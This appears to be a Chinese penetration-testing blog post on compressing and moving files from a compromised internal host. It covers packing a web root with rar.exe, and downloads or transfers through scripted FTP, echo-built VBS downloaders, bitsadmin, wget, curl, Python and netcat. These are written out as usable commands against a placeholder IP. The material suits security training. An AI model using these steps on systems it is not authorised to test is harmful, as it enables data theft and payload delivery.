内网渗透之——数据压缩、传输
数据压缩
作用:
将文件打包,方便下载
Linux
直接使用tar命令压缩
windows
利用Rar.exe(winrar.exe里的执行文件)
参数说明:
a 添加文件到压缩文件中
-k 锁定压缩文件
-s产生固体存档,这样可以增大压缩比
-r包括子目录
-m 设置压缩比
-m0 存储 添加到压缩文件时不压缩文件。
-m1 最快 使用最快方式(低压缩)
-m2 较快 使用快速压缩方式
-m3 标准 使用标准(默认)压缩方式
-m4 较好 使用较好压缩方式(较好压缩,但是慢)
-m5 最好 使用最大压缩方式(最好的压缩,但是最慢)
常用压缩命令
把C:\inetpub\wwwroot目录下的所有东西打包为1.rar放到C:\inetpub\wwwroot目录下
rar.exe a -r -m1 C:\inetpub\wwwroot\1.rar C:\inetpub\wwwroot
数据传输
作用:
如果我们只拿到了一个命令行shell ,是无法直接传输文件的
Windwos
ftp上传下载
交互式命令行
1.输入ftp进入命令行使用ftp模式
2.输入?可查看命令
3.输入命令登陆ftp,之后输入账号密码
open 192.168.0.106(ftp地址)
ftp 192.168.0.106(ftp地址)
4.查看FTP服务器上的文件
dir:显示服务器目录和文件列表
ls:显示服务器简易的文件列表
cd:进入服务器指定的目录
5.上传下载文件
上传和下载文件时应该使用正确的传输类型,FTP的传输类型分为ASCII码方式和二进制方式两种,对.txt、.htm等文件应采用ASCII码方式传输,对.exe或图片、视频、音频等文件应采用二进制方式传输。在默认情况下,FTP为ASCII码传输方式
设置传输方式
type:查看当前的传输方式
ascii:设定传输方式为ASCII码方式
binary:设定传输方式为二进制方式
以上命令都不带参数
下载文件:
下载指定文件:filename为下载的FTP服务器上的文件名,newname为保存在本地计算机上时使用的名字,如果不指定newname,文件将以原名保存,get命令下载的文件将保存在本地计算机的工作目录下(当前目录)
get filename newname
上传文件:
上传指定文件:
filename为上传的本地文件名,newname为上传至FTP服务器上时使用的名字,如果不指定newname,文件将以原名上传
put filename newname
send filename newname
6.结束并退出FTP
close:结束与服务器的FTP会话
quit或者bye:结束与服务器的FTP会话并退出FTP环境
7. 其它FTP命令
pwd:查看FTP服务器上的当前工作目录
rename filename newfilename:重命名FTP服务器上的文件
deletefilename:删除FTP服务器上的文件
非交互式命令行
原理:命令行直接输入ftp -s:文件名,就会将文件里写好的ftp命令执行
1.利用重定向依次将ftp命令写入txt文件
echo open 192.168.0.106>> ftp.txt
echo lp>> ftp.txt
echo 123456>> ftp.txt
echo get 1.txt xxx.txt>> ftp.txt
echo bye>> ftp.txt
2.输入以下命令,ftp.txt文件里的命令就会执行
ftp -s:ftp.txt
vbs脚本下载
vbs脚本内容:修改http://192.168.0.106/1.php处为下载的文件,C:\Users\Administrator\1.php处为下载到哪
Set xPost=createObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://192.168.0.106/1.php",0
xPost.Send()
set sGet=createObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write(xPost.ResponseBody)
sGet.SaveToFile "C:\Users\Administrator\1.php",2
交互式shell
直接输入cscript 1.vbs即可执行
非交互式命令行
1.利用重定向依次将vbs脚本内容写入vbs文件
echo Set xPost=createObject("Microsoft.XMLHTTP")>> 2.vbs
echo xPost.Open "GET","http://192.168.0.106/1.php",0 >> 2.vbs
echo xPost.Send()>> 2.vbs
echo set sGet=createObject("ADODB.Stream")>> 2.vbs
echo sGet.Mode=3 >> 2.vbs
echo sGet.Type=1 >> 2.vbs
echo sGet.Open()>> 2.vbs
echo sGet.Write(xPost.ResponseBody)>> 2.vbs
echo sGet.SaveToFile "C:\Users\Administrator\lpxr.php",2 >> 2.vbs
2.输入cscript 2.vbs执行
bitsadmin下载
Windows2008 可用
命令:
bitsadmin /transfer n http://192.168.0.106/1.zip c:\12.zip
http://192.168.0.106/1.zip:从哪里下载 c:\12.zip:下载到哪
Linux
wget文件下载
命令
wget http://192.168.0.106/1.zip -P /root/1.zip
http://192.168.0.106/1.zip:下载路径 -P /root/1.zip:指定下载到哪
curl文件下载
命令
curl http://192.168.0.106/1.zip --output aa.zip
http://192.168.0.106/1.zip:下载路径 --output aa.zip:指定下载到哪
python文件下载
脚本内容
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://192.168.0.106/1.zip')
localFile = open('/root/1.zip', 'w')
localFile.write(u.read())
localFile.close()
http://192.168.0.106/1.zip替换下载地址 /root/1.zip处写下载到哪
之后执行
nc文件传输
服务端输入:
cat filename | nc -lvvp 1234
下载端输入:
nc 下载地址ip 1234 > filename
上一篇: 内网信息搜集
下一篇: 【HTML学习】——第二天